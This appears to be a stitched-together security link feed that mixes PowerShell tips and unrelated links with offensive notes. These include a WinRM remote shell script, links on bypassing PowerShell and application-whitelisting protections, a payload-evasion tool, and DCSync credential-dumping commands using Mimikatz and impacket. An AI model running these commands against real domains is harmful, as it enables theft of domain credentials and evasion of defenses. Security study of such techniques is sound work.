Windows Powershell Display Current Folder Name
- Check your Powershell profile file
- Edit that file and add this function
- Run powershell again
- Check your Powershell profile file
PS /home/User/> $profile
/home/user/.config/powershell/Microsoft.PowerShell_profile.ps1
- Edit that file and add this function
function prompt {
$p = Split-Path -leaf -path (Get-Location)
"$p> "
}- Run powershell again
PowerShell 6.2.4
Copyright (c) Microsoft Corporation. All rights reserved.
https://aka.ms/pscore6-docs
Type 'help' to get help.
User>
WinRM Ruby with SSL Certificate support.
$ cat winrm.rbResource: https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell.rb
#!/usr/bin/ruby
require 'winrm'
# Author: Alamot
conn = WinRM::Connection.new(
endpoint: 'https://<IP-HOST-WINDOWS>:5986/wsman',
transport: :ssl,
client_cert: '/user/dir/cert.cer',
client_key: '/user/dir/private.key',
:no_ssl_peer_verification => true
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
GitHub
code-snippets/winrm/winrm_shell.rb at master Β· Alamot/code-snippets
Various code snippets. Contribute to Alamot/code-snippets development by creating an account on GitHub.
Powershell Constrained Language Mode ByPass - Understanding ConstrainedLanguageMode
https://ired.team/offensive-security/code-execution/powershell-constrained-language-mode-bypass
https://ired.team/offensive-security/code-execution/powershell-constrained-language-mode-bypass
www.ired.team
Powershell Constrained Language Mode Bypass | Red Team Notes
Understanding ConstrainedLanguageMode
Bypass for PowerShell Constrained Language Mode without Powershell Downgrade(v2)
https://github.com/padovah4ck/PSByPassCLM
https://github.com/padovah4ck/PSByPassCLM
GitHub
GitHub - padovah4ck/PSByPassCLM: Bypass for PowerShell Constrained Language Mode
Bypass for PowerShell Constrained Language Mode. Contribute to padovah4ck/PSByPassCLM development by creating an account on GitHub.
Detecting Offensive PowerShell Attack Tools
https://adsecurity.org/?p=2604
https://adsecurity.org/?p=2604
Active Directory Security
Detecting Offensive PowerShell Attack Tools
At DerbyCon V (2015), I presented on Active Directory Attack & Defense and part of this included how to detect & defend against PowerShell attacks. Update: I presented at BSides Charm (Baltimore) on PowerShell attack & defense in April 2016. More informationβ¦
How Attackers Are Bypassing PowerShell Protections
https://blog.stealthbits.com/how-attackers-are-bypassing-powershell-protections/
https://blog.stealthbits.com/how-attackers-are-bypassing-powershell-protections/
Insider Threat Security Blog
How Attackers Are Bypassing PowerShell Protections | Insider Threat Blog
PowerShell Security: PowerShell Attack Tools, Mitigation, and Detection and How Attackers are bypassing PowerShell Protections.
GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.
https://github.com/GreatSCT/GreatSCT
https://github.com/GreatSCT/GreatSCT
GitHub
GitHub - GreatSCT/GreatSCT: The project is called Great SCT (Great Scott). Great SCT is an open source project to generate applicationβ¦
The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team. - GreatSCT/GreatSCT
Bypass Application Whitelisting using msbuild.exe (Multiple Methods)
https://www.hackingarticles.in/bypass-application-whitelisting-using-msbuild-exe-multiple-methods/
https://www.hackingarticles.in/bypass-application-whitelisting-using-msbuild-exe-multiple-methods/
Hacking Articles
Bypass Application Whitelisting using msbuild.exe (Multiple Methods)
The purpose of this post is to demonstrate the most common and familiar techniques of whitelisting AppLocker bypass. As we know for security reason, the system admin adds group policies to restrict app execution for the local user. In our previous articleβ¦
How to run and detect DCSync.
https://yojimbosecurity.ninja/dcsync
https://yojimbosecurity.ninja/dcsync
Petruknisme's Feed
How to run and detect DCSync. https://yojimbosecurity.ninja/dcsync
How to Dsync Attack
- Local
- Remote using impacket
- Local
Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt /domain:Win2016.local"'
- Remote using impacket
secretsdump.py -just-dc <user>:<password>@<ipaddress>
Watch "5G Protocol Vulnerabilities and Exploits - Roger Piqueras Jover (Shmoocon 2020)" on YouTube
https://youtu.be/Nk4ghKTvwfg
If you find information in this channel is useful, please consider to share this channel
https://t.me/petruk_feed
https://youtu.be/Nk4ghKTvwfg
If you find information in this channel is useful, please consider to share this channel
https://t.me/petruk_feed
YouTube
5G Protocol Vulnerabilities and Exploits - Roger Piqueras Jover (Shmoocon 2020)
The first protocol exploits against LTE were introduced in early 2016. Since then, security researchers have published a large number of excellent papers and talks identifying more and more critical vulnerabilities in the LTE protocol. 3GPP released the 5Gβ¦
Learn Kubernetes using Interactive Browser Based
https://www.katacoda.com/courses/kubernetes
https://www.katacoda.com/courses/kubernetes
Track conronavirus cases from the Linux/Unix/macOS command line:
curl https://corona-stats.online/
curl https://corona-stats.online/US
curl https://corona-stats.online/China
Ref: https://github.com/sagarkarira/coronavirus-tracker-cli/
curl https://corona-stats.online/
curl https://corona-stats.online/US
curl https://corona-stats.online/China
Ref: https://github.com/sagarkarira/coronavirus-tracker-cli/
GitHub
GitHub - sagarkarira/coronavirus-tracker-cli: Track conronavirus cases from command line. curl https://corona-stats.online/
Track conronavirus cases from command line. curl https://corona-stats.online/ - GitHub - sagarkarira/coronavirus-tracker-cli: Track conronavirus cases from command line. curl https://corona-stats.o...
Wild West Hackin' Fest https://www.youtube.com/channel/UCef0TWni8ghLcJphdmDBoxw
Introduction to Reinforcement Learning
By DeepMind : https://youtube.com/watch?v=2pWv7GOvuf0&list=PLqYmG7hTraZDM-OYHWgPebj2MfCFzFObQ
#ArtificialIntelligence #DeepLearning #ReinforcementLearning
By DeepMind : https://youtube.com/watch?v=2pWv7GOvuf0&list=PLqYmG7hTraZDM-OYHWgPebj2MfCFzFObQ
#ArtificialIntelligence #DeepLearning #ReinforcementLearning
YouTube
RL Course by David Silver - Lecture 1: Introduction to Reinforcement Learning
#Reinforcement Learning Course by David Silver# Lecture 1: Introduction to Reinforcement Learning
#Slides and more info about the course: http://goo.gl/vUiyjq
#Slides and more info about the course: http://goo.gl/vUiyjq
One-liner powershell to List All process and owners without Admin privilege.
powershell -version 2 -c " & {Get-WmiObject -Query "'Select * from Win32_Process'" | where {$_.Name -notlike "'svchost*'"} | Select Name, Handle, @{Label="'Owner'";Expression={$_.GetOwner().User}} | ft -AutoSize }"-----------------------------SNIP--------------------
RemoteRegistry NT AUTHORITY\LocalService
RpcEptMapper NT AUTHORITY\NetworkService
RpcSs NT AUTHORITY\NetworkService
SamSs LocalSystem
Schedule LocalSystem
SENS LocalSystem
ShellHWDetection LocalSystem
Spooler LocalSystem
UxSms localSystem
vds LocalSystem
VGAuthService LocalSystem
VMTools LocalSystem